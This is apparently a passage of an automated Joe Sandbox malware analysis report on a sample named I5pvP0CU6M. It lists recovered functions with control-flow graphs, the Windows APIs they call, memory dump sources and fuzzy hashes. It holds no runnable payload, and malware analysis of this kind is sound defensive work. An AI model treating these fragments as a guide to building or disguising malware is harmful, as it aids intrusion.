                                                          • Opcode Fuzzy Hash: 92d4b636c86de5f0e331ea7c75517c5ed4ce790cc2968469d66f13eb158d805c
                                                          • Instruction Fuzzy Hash: BD417275E006199FDB08DFEAD8456AEFBF2BF88300F14C12AD819AB254EB345946CF50
                                                          Function 010CD288 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 556 10cd288-10cd327 GetCurrentProcess 561 10cd329-10cd32f 556->561 562 10cd330-10cd364 GetCurrentThread 556->562 561->562 563 10cd36d-10cd3a1 GetCurrentProcess 562->563 564 10cd366-10cd36c 562->564 565 10cd3aa-10cd3c5 call 10cd469 563->565 566 10cd3a3-10cd3a9 563->566 564->563 570 10cd3cb-10cd3fa GetCurrentThreadId 565->570 566->565 571 10cd3fc-10cd402 570->571 572 10cd403-10cd465 570->572 571->572
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD316
                                                          • GetCurrentThread.KERNEL32 ref: 010CD353
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD390
                                                          • GetCurrentThreadId.KERNEL32 ref: 010CD3E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 375a50a3e3d6046ba554114d215f867e9086326f7383a16b2ac775ec71ac0f0f
                                                          • Instruction ID: e9cbfca0257e90d52280f60ce4d292f58f8481fefaca9bd80e58e8c873989066
                                                          • Opcode Fuzzy Hash: 375a50a3e3d6046ba554114d215f867e9086326f7383a16b2ac775ec71ac0f0f
                                                          • Instruction Fuzzy Hash: 705188B09003498FDB44CFAAD588B9EBFF1FF88314F208499E148A72A0DB746944CF61
                                                          Function 010CD298 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 579 10cd298-10cd327 GetCurrentProcess 583 10cd329-10cd32f 579->583 584 10cd330-10cd364 GetCurrentThread 579->584 583->584 585 10cd36d-10cd3a1 GetCurrentProcess 584->585 586 10cd366-10cd36c 584->586 587 10cd3aa-10cd3c5 call 10cd469 585->587 588 10cd3a3-10cd3a9 585->588 586->585 592 10cd3cb-10cd3fa GetCurrentThreadId 587->592 588->587 593 10cd3fc-10cd402 592->593 594 10cd403-10cd465 592->594 593->594
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD316
                                                          • GetCurrentThread.KERNEL32 ref: 010CD353
                                                          • GetCurrentProcess.KERNEL32 ref: 010CD390
                                                          • GetCurrentThreadId.KERNEL32 ref: 010CD3E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 2c6091e0c6afe21c4c237bf5507032744e5c5d794a340fd9b43cd9d68d0fce42
                                                          • Instruction ID: d33830e4ba859f230a8f44ca02ab0b892da577c798bb34cc891e61cac0b5dd82
                                                          • Opcode Fuzzy Hash: 2c6091e0c6afe21c4c237bf5507032744e5c5d794a340fd9b43cd9d68d0fce42
                                                          • Instruction Fuzzy Hash: 2C5175B19007098FDB44CFAAD588B9EBFF1BF88314F208469E149A72A0DB746944CF65
                                                          Function 010CAED9 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 628 10caed9-10caef7 630 10caef9-10caf06 call 10c9e40 628->630 631 10caf23-10caf27 628->631 637 10caf1c 630->637 638 10caf08 630->638 633 10caf29-10caf33 631->633 634 10caf3b-10caf7c 631->634 633->634 640 10caf7e-10caf86 634->640 641 10caf89-10caf97 634->641 637->631 684 10caf0e call 10cb53a 638->684 685 10caf0e call 10cb570 638->685 686 10caf0e call 10cb580 638->686 640->641 642 10caf99-10caf9e 641->642 643 10cafbb-10cafbd 641->643 645 10cafa9 642->645 646 10cafa0-10cafa7 call 10c9e4c 642->646 648 10cafc0-10cafc7 643->648 644 10caf14-10caf16 644->637 647 10cb058-10cb118 644->647 650 10cafab-10cafb9 645->650 646->650 679 10cb11a-10cb11d 647->679 680 10cb120-10cb14b GetModuleHandleW 647->680 651 10cafc9-10cafd1 648->651 652 10cafd4-10cafdb 648->652 650->648 651->652 653 10cafdd-10cafe5 652->653 654 10cafe8-10caff1 call 10c9e5c 652->654 653->654 660 10caffe-10cb003 654->660 661 10caff3-10caffb 654->661 662 10cb005-10cb00c 660->662 663 10cb021-10cb02e 660->663 661->660 662->663 665 10cb00e-10cb01e call 10c9e6c call 10c9e7c 662->665 670 10cb030-10cb04e 663->670 671 10cb051-10cb057 663->671 665->663 670->671 679->680 681 10cb14d-10cb153 680->681 682 10cb154-10cb168 680->682 681->682 684->644 685->644 686->644
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 010CB13E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: bacc0a23292a97a8da4e0af7be364e842d7131ea688f9cf0ccc5bc1956053901
                                                          • Instruction ID: bcf92fb5038d54260b999358292066f8b6bb6823ba20bc26dc35e9c2d40cb6d7
                                                          • Opcode Fuzzy Hash: bacc0a23292a97a8da4e0af7be364e842d7131ea688f9cf0ccc5bc1956053901
                                                          • Instruction Fuzzy Hash: 238157B0A00B058FE764DF69D04579ABBF1BF88700F008A6DE496D7A81D774E846CF90
                                                          Function 02B81AC4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 687 2b81ac4-2b81b36 689 2b81b38-2b81b3e 687->689 690 2b81b41-2b81b48 687->690 689->690 691 2b81b4a-2b81b50 690->691 692 2b81b53-2b81bf2 CreateWindowExW 690->692 691->692 694 2b81bfb-2b81c33 692->694 695 2b81bf4-2b81bfa 692->695 699 2b81c40 694->699 700 2b81c35-2b81c38 694->700 695->694 701 2b81c41 699->701 700->699 701->701
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B81BE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 8d0b69ac750189d0e66aa4b7dd6a65e40328f3764c17b3746ae99ac5ee327e09
                                                          • Instruction ID: b9208975c1711b3d3c32b1870387865c5da4c6940f56beff503e41504ad934b6
                                                          • Opcode Fuzzy Hash: 8d0b69ac750189d0e66aa4b7dd6a65e40328f3764c17b3746ae99ac5ee327e09
                                                          • Instruction Fuzzy Hash: A551C0B1D11349DFDB14CFA9C884ADEBBB5FF48310F24816AE919AB210D7759886CF90
                                                          Function 02B81AD0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 702 2b81ad0-2b81b36 703 2b81b38-2b81b3e 702->703 704 2b81b41-2b81b48 702->704 703->704 705 2b81b4a-2b81b50 704->705 706 2b81b53-2b81bf2 CreateWindowExW 704->706 705->706 708 2b81bfb-2b81c33 706->708 709 2b81bf4-2b81bfa 706->709 713 2b81c40 708->713 714 2b81c35-2b81c38 708->714 709->708 715 2b81c41 713->715 714->713 715->715
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02B81BE2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: d90cff33478e0544eba0a03de30f5d18dbe56c2ccc4f8b4eee9d80cf7c137564
                                                          • Instruction ID: bc4e450469e3753eb649c55d014f618f80aaebc2086d7dde1bb7be592fa87c7e
                                                          • Opcode Fuzzy Hash: d90cff33478e0544eba0a03de30f5d18dbe56c2ccc4f8b4eee9d80cf7c137564
                                                          • Instruction Fuzzy Hash: 9241CEB1D11349DFDB14CFAAC884ADEBBB5FF48310F24816AE918AB210D771A845CF90
                                                          Function 010C58EC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 716 10c58ec-10c59b9 CreateActCtxA 718 10c59bb-10c59c1 716->718 719 10c59c2-10c5a1c 716->719 718->719 726 10c5a1e-10c5a21 719->726 727 10c5a2b-10c5a2f 719->727 726->727 728 10c5a40 727->728 729 10c5a31-10c5a3d 727->729 731 10c5a41 728->731 729->728 731->731
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 010C59A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: cad56c82e98ee0791f723c659fe02adcdba22e6a5e9466c2c418e422fb2375e1
                                                          • Instruction ID: f3fcf3b72d7b87e83b296683b0ef9d39e254fa5f417d40ed54c3241b6acbb3f6
                                                          • Opcode Fuzzy Hash: cad56c82e98ee0791f723c659fe02adcdba22e6a5e9466c2c418e422fb2375e1
                                                          • Instruction Fuzzy Hash: AF41E270D00719CBEB24CFAAC9847DEBBF5BF88704F20809AD448AB251DB716946CF50
                                                          Function 010C44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 732 10c44d4-10c59b9 CreateActCtxA 735 10c59bb-10c59c1 732->735 736 10c59c2-10c5a1c 732->736 735->736 743 10c5a1e-10c5a21 736->743 744 10c5a2b-10c5a2f 736->744 743->744 745 10c5a40 744->745 746 10c5a31-10c5a3d 744->746 748 10c5a41 745->748 746->745 748->748
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 010C59A9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 5e303391c4902066e2edbaa586f2a7a37ef70668113ece8d55905b42df465c80
                                                          • Instruction ID: 0d0f577ac997407e06822021bad9bda2f9c9823ae17f88a43ec9f826e2d0dfd3
                                                          • Opcode Fuzzy Hash: 5e303391c4902066e2edbaa586f2a7a37ef70668113ece8d55905b42df465c80
                                                          • Instruction Fuzzy Hash: B641F370D0071DCBEB24CFAAC98479EBBF5BF48704F2080AAD409AB251DB716945CF90
                                                          Function 02B840A0 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 749 2b840a0-2b840dc 750 2b8418c-2b841ac 749->750 751 2b840e2-2b840e7 749->751 757 2b841af-2b841bc 750->757 752 2b840e9-2b84120 751->752 753 2b8413a-2b84172 CallWindowProcW 751->753 759 2b84129-2b84138 752->759 760 2b84122-2b84128 752->760 755 2b8417b-2b8418a 753->755 756 2b84174-2b8417a 753->756 755->757 756->755 759->757 760->759
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 02B84161
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 2f3a2552f9b24d332dd22b192d503a7686106a5a56087382ae747fc67e34345c
                                                          • Instruction ID: 3d53b73eb146f8c2a235ffbd868b9139d3716d076af0cddaa49753d7ec9a44a9
                                                          • Opcode Fuzzy Hash: 2f3a2552f9b24d332dd22b192d503a7686106a5a56087382ae747fc67e34345c
                                                          • Instruction Fuzzy Hash: 3341FCB5A0030ACFDB14DF99C484AAAFBF5FF98314F248499D51967321D774A841CFA0
                                                          Function 010CD4D8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 763 10cd4d8-10cd4de 764 10cd4e0-10cd574 DuplicateHandle 763->764 765 10cd57d-10cd59a 764->765 766 10cd576-10cd57c 764->766 766->765
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD567
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: fa93a509cfe294a513d900b4a0f896ffde055822eed6fe441fe317135a6b73f0
                                                          • Instruction ID: 43f4faf7bd2e6d3e95c80cf4f03a8e5153a327d56eac2248dbd2a8ec1464d214
                                                          • Opcode Fuzzy Hash: fa93a509cfe294a513d900b4a0f896ffde055822eed6fe441fe317135a6b73f0
                                                          • Instruction Fuzzy Hash: 8B21F4B5900249DFDB10CFAAD984ADEBBF4EB48714F10801AE954A3310D374A945CFA1
                                                          Function 010CD4E0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 769 10cd4e0-10cd574 DuplicateHandle 770 10cd57d-10cd59a 769->770 771 10cd576-10cd57c 769->771 771->770
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010CD567
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 741b3aa120613137f19138b965c117379b8e89233bf0819f04da39e6457d602a
                                                          • Instruction ID: 2dc34a1ab19a04dcf3f8402fb9bc172dd41802431eb052c94c35124dd53d923c
                                                          • Opcode Fuzzy Hash: 741b3aa120613137f19138b965c117379b8e89233bf0819f04da39e6457d602a
                                                          • Instruction Fuzzy Hash: 6D21E3B5900249DFDB10CFAAD984ADEBFF4EB48720F14841AE954A3310D374A950CFA1
                                                          Function 010CB0D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 774 10cb0d8-10cb118 775 10cb11a-10cb11d 774->775 776 10cb120-10cb14b GetModuleHandleW 774->776 775->776 777 10cb14d-10cb153 776->777 778 10cb154-10cb168 776->778 777->778
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 010CB13E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2215038486.00000000010C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: d6e4655c86a10de065bdd041f99444792c3e6453e3f57cea52083caa01482592
                                                          • Instruction ID: 68ce301ca0bbec3293ce273ebcc6b80b0890c1b54a8cba25fd22f40c0dc8d861
                                                          • Opcode Fuzzy Hash: d6e4655c86a10de065bdd041f99444792c3e6453e3f57cea52083caa01482592
                                                          • Instruction Fuzzy Hash: 591102B5C002498FDB10CF9AC444A9EFBF4AB88624F10845AD958A7200D375A545CFA1
                                                          Function 00EAD4C4 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2212393354.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ead000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17008b22e0ecb2aea53e5fd89c7fe13a8f9f9ac709986a36932bb36c4311551c
                                                          • Instruction ID: 4c50d2ac8910ec134aa9ea4e53dcf343d18d776c162ddb412064d31a95e0b051
                                                          • Opcode Fuzzy Hash: 17008b22e0ecb2aea53e5fd89c7fe13a8f9f9ac709986a36932bb36c4311551c
                                                          • Instruction Fuzzy Hash: 36210672908240DFDB05DF14D9C0B26BF65FB8D318F24C569E90A1F656C336E856CAA1
                                                          Function 00EAD3D8 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2212393354.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ead000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02f7a119918ea752a7f8d0d41223177ecf4533d63812f5f25db179216f60e9ee
                                                          • Instruction ID: 10479791c8cd7f2e81d08af02e5cb5d3b3263a997a6265b93193996182c15a9a
                                                          • Opcode Fuzzy Hash: 02f7a119918ea752a7f8d0d41223177ecf4533d63812f5f25db179216f60e9ee
                                                          • Instruction Fuzzy Hash: 8521F476508204DFDB04DF14D9C0B2ABF65FB9D324F20C169D90A5F656C336F856CAA1
                                                          Function 00EBD01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2213837630.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ebd000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa96e3abe0788a1c47ddb75cddcf2fda62398e90e38d830994c1ad78feaf702a
                                                          • Instruction ID: 039ab015d0b352a1f46c1fa1bf2892e7ada83c6bd2664dc4b5f2c05386e4114a
                                                          • Opcode Fuzzy Hash: aa96e3abe0788a1c47ddb75cddcf2fda62398e90e38d830994c1ad78feaf702a
                                                          • Instruction Fuzzy Hash: 85212275608300EFCB14EF14D9C0B67BB66FB88318F20C56DD90A5B292D37AD807CA61
                                                          Function 00EBD1D4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2213837630.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ebd000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f566fbeabc070661745147f07bc807eeef830632605340c9354394839582f16e
                                                          • Instruction ID: f11f9dd7d92f17086163eb4f07b02d24b2d7c229f1468d489e0de0fbf5e6f586
                                                          • Opcode Fuzzy Hash: f566fbeabc070661745147f07bc807eeef830632605340c9354394839582f16e
                                                          • Instruction Fuzzy Hash: FF216471508380EFCB05DF10D9C0BA6BBA1FB84318F20C56CE9095B2A2D336D806CB61
                                                          Function 00EBD005 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2213837630.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ebd000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78f291d7bb87affc06145141bef5392208568e98fdd98df5a2f09cbc938e8fcf
                                                          • Instruction ID: cac22aab36f4b7b6da0caf7ed88a2893d8154fc6ba0141e2f928e8d538797dd8
                                                          • Opcode Fuzzy Hash: 78f291d7bb87affc06145141bef5392208568e98fdd98df5a2f09cbc938e8fcf
                                                          • Instruction Fuzzy Hash: 6E21537550D3C08FCB12DF24D994756BF71EB46314F28C5DAD8498B6A7C33A980ACB62
                                                          Function 00EAD4BF Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2212393354.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ead000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction ID: f314e34470983ce21be4afb46754dae50b06d97f765261e4416266718ea79650
                                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction Fuzzy Hash: 8B11E976904280CFCB15CF10D9C4B16BF71FB98318F24C5A9D8454F656C336E456CB91
                                                          Function 00EAD3D3 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2212393354.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ead000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction ID: 56f18ac66e525209e62ad596091115b85045c9bb075460b46de0684cd1474ff1
                                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                          • Instruction Fuzzy Hash: CA11E976504240DFDB15CF10D9C4B16BF71FB99324F24C6A9D80A4F656C33AE456CB91
                                                          Function 00EBD1CF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2213837630.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ebd000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction ID: f7e622f0bcedeb5de716dbce817dd3c5d3772c1cc8ebebff6de6653b3f5b422e
                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                          • Instruction Fuzzy Hash: AB11BB75508280DFCB02CF50C9C0B56BBA1FB84318F24C6A9D8494B2A6C33AD81ACBA1
                                                          Function 00EAD745 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2212393354.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ead000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6c0e5081a47afc61ef5776651cbf54f9c2ec876df8174d0c5a74f5f9c8fa341
                                                          • Instruction ID: 0ded20246b2a5c9131a2c6c3bd2cac320025a28cbb26d2f886b6fa7ddcafd487
                                                          • Opcode Fuzzy Hash: b6c0e5081a47afc61ef5776651cbf54f9c2ec876df8174d0c5a74f5f9c8fa341
                                                          • Instruction Fuzzy Hash: 0A012B7140C340DAE7144E25CD84B67BF98DF4A334F18D51BFE0A6F692CA79A840C671
                                                          Function 00EAD744 Relevance: .0, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2212393354.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ead000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd73dcfcc0012d7f4c4fafc9ff5ae225fcc9979463a5b09c1ab04c411cdc0311
                                                          • Instruction ID: a5c5f3ac10f15c2cc44746460d8fd06d84afe27d3bf487c373737992f5a89174
                                                          • Opcode Fuzzy Hash: fd73dcfcc0012d7f4c4fafc9ff5ae225fcc9979463a5b09c1ab04c411cdc0311
                                                          • Instruction Fuzzy Hash: 73F0C2714083449AE7148E15CC84B62FF98EB85738F18C05BFD091F696C679A844CBB1

                                                          Non-executed Functions

                                                          Function 058D0378 Relevance: .6, Instructions: 618COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e5489fa83c03f70d7eefe3f210d99c6f7eb7b925fcf2a5cdff3a8c97c342f4d
                                                          • Instruction ID: 70822d5e32dcc21ec99e6bf49c13fb7b49dde99db2d669e3de95ab68075a6ccc
                                                          • Opcode Fuzzy Hash: 0e5489fa83c03f70d7eefe3f210d99c6f7eb7b925fcf2a5cdff3a8c97c342f4d
                                                          • Instruction Fuzzy Hash: 2E322970E00219CFDB58DFA9D8557AEBBF2AF88300F148569D409EB285EB349D45CFA1
                                                          Function 02B80228 Relevance: .3, Instructions: 315COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2219047219.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2b80000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c27fa23e5ad0e96cb03c2899441db991df66f1652692f848c0ed4b86192eeae
                                                          • Instruction ID: 07536fd2e3895c3750b053851dd071adfa6084ed2c3b7d9433c99e5ef8da66d5
                                                          • Opcode Fuzzy Hash: 1c27fa23e5ad0e96cb03c2899441db991df66f1652692f848c0ed4b86192eeae
                                                          • Instruction Fuzzy Hash: A11273B1801746CAEB38CF65E94C2897BB9FB85328F904709D2616F2E9DBB4154BCF44
                                                          Function 058D9CA0 Relevance: .3, Instructions: 312COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2227338152.00000000058D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_58d0000_I5pvP0CU6M.jbxd
                                                          Similarity
                                                          • API ID:
